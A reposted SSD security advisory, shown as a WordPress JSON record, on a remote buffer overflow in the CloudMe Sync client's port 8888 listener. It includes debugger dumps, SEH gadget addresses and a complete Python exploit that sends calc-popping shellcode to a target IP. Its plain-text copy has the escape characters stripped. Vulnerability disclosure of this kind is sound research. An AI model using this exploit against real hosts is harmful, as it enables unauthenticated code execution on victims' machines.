{"id":11440,"date":"2018-02-11T14:19:14","date_gmt":"2018-02-11T22:19:14","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5211\/"},"modified":"2018-02-11T14:19:14","modified_gmt":"2018-02-11T22:19:14","slug":"news-5211","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/02\/11\/news-5211\/","title":{"rendered":"SSD Advisory &#8211; CloudMe Unauthenticated Remote Buffer Overflow"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Feb 2018 07:06:24 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p>The following advisory describes one (1) vulnerability found in CloudMe.<\/p>\n<p>CloudMe is &#8220;a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.&#8221;<\/p>\n<p>The vulnerability is a buffer overflow which, when exploited, can cause the product to execute arbitrary code.<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher, hyp3rlinx, reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released CloudMe version 1.11.0, which addresses this vulnerability.<\/p>\n<p><strong>Affected version<\/strong><br \/> CloudMe Sync version v1.10.9 and prior<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> An unauthenticated remote attacker who can connect to the &#8220;CloudMe Sync&#8221; client application listening on port 8888 can send a malicious payload that causes a buffer overflow. This gives the attacker control of the program\u2019s execution flow and allows arbitrary code execution on the victim\u2019s PC.<\/p>\n<p>The CloudMe Sync client creates a socket listening on TCP port 8888 (0x22B8).<\/p>\n<p>In Qt5Core:<\/p>\n<div id=\"crayon-5a80c16202d39738238269\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">00564DF1   . C74424 04 B822&gt;MOV DWORD PTR SS:[ESP+4],22B8\n00564DF9   . 890424         MOV DWORD PTR SS:[ESP],EAX\n00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[&lt;&amp;Qt5Network._ZN10QTc&gt;;  Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst<\/textarea><\/div>\n<\/div>\n<p><strong>Buffer overflow condition<\/strong><br \/> The EIP register is overwritten at about 1075 bytes.<\/p>\n<div id=\"crayon-5a80c16202d41055172856\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div
class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">EAX 00000001\nECX 76F698DA msvcrt.76F698DA\nEDX 00350000\nEBX 41414141\nESP 0028D470\nEBP 41414141\nESI 41414141\nEDI 41414141\nEIP 41414141<\/textarea><\/div>\n<\/div>\n<p><strong>Stack dump information<\/strong><\/p>\n<div id=\"crayon-5a80c16202d45915107045\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">(508.524): Access violation - code c0000005 (first\/second chance not available)\n*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -\neax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000\neip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc\ncs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246\n41414141 ??              ???<\/textarea><\/div>\n<\/div>\n<p>Exploitation is very easy because ASLR and SafeSEH are both set to false, making the exploit portable and able to work across different operating systems.
We will therefore use a Structured Exception Handler (SEH) overwrite for our exploit.<\/p>\n<p>e.g.<\/p>\n<div id=\"crayon-5a80c16202d48455197991\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">6FE6909D     0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Users\\victimo\\AppData\\Local\\Programs\\CloudMe\\CloudMe\\libstdc++-6.dll)\n00476795     0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\\Users\\victimo\\AppData\\Local\\Programs\\CloudMe\\CloudMe\\CloudMe.exe)\n61E7B7F6     0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\\Users\\victimo\\AppData\\Local\\Programs\\CloudMe\\CloudMe\\Qt5Gui.dll)<\/textarea><\/div>\n<\/div>\n<p><strong>Exploit<\/strong><\/p>\n<div id=\"crayon-5a80c16202d4b112194257\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import socket,struct    print &#8216;CloudMe Sync v1.10.9&#8217;  print &#8216;Unauthenticated Remote Buffer Overflow 0day&#8217;  print &#8216;Discovery\/credits: hyp3rlinx&#8217;  print &#8216;apparition securityn&#8217;      #shellcode to pop calc.exe Windows 7 SP1  sc=(&#8220;x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B&#8221;  &#8220;x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B&#8221;  &#8220;x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31&#8221;  &#8220;xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA&#8221;  &#8220;x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14&#8221;  
&#8220;x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65&#8221;  &#8220;x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC&#8221;)      ip=raw_input(&#8216;[+] CloudMe Target IP&gt; &#8216;)     nseh=&#8221;xEBx06&#8243;+&#8221;x90&#8243;*2                #JMP  seh=struct.pack(&#8216;&lt;L&#8217;,0x61e7b7f6)        #POP,POP RET   junk=&#8221;A&#8221;*2232+nseh+seh+sc+&#8221;B&#8221;*5600  payload=junk+nseh+seh+sc    def PwnMe(ip,payload):      s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)              s.connect((ip,8888))      s.send(payload)      print &#8216;Sending buffer overflow packetz&#8217;      raw_input()      if __name__ == &#8216;__main__&#8217;:      PwnMe(ip,payload)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-3\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;CloudMe Sync v1.10.9&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-4\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Unauthenticated Remote Buffer Overflow 0day&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-5\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Discovery\/credits: hyp3rlinx&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-6\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;apparition securityn&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-9\"><span class=\"crayon-p\">#shellcode to pop 
calc.exe Windows 7 SP1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-10\"><span class=\"crayon-v\">sc<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-11\"><span class=\"crayon-s\">&#8220;x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-12\"><span class=\"crayon-s\">&#8220;x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-13\"><span class=\"crayon-s\">&#8220;xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-14\"><span class=\"crayon-s\">&#8220;x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-15\"><span class=\"crayon-s\">&#8220;x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-16\"><span class=\"crayon-s\">&#8220;x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-19\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;[+] CloudMe Target IP&gt; &#8216;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-21\"><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;xEBx06&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;x90&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#JMP<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-22\"><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;&lt;L&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x61e7b7f6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#POP,POP RET <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-23\"><span class=\"crayon-v\">junk<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">2232<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">sc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;B&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">5600<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-24\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-v\">junk<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">sc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-26\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">PwnMe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AF_INET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOCK_STREAM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">connect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">8888<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Sending buffer overflow packetz&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-34\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PwnMe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3669\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Feb 2018 07:06:24 +0000<\/strong><\/p>\n<p>The following advisory describes one (1) vulnerability found in CloudMe. CloudMe is &#8220;a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.&#8221; The vulnerability found is a buffer &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3669\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; CloudMe Unauthenticated Remote Buffer 
Overflow<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11851,10757,12136],"class_list":["post-11440","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11440"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11440\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11440"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}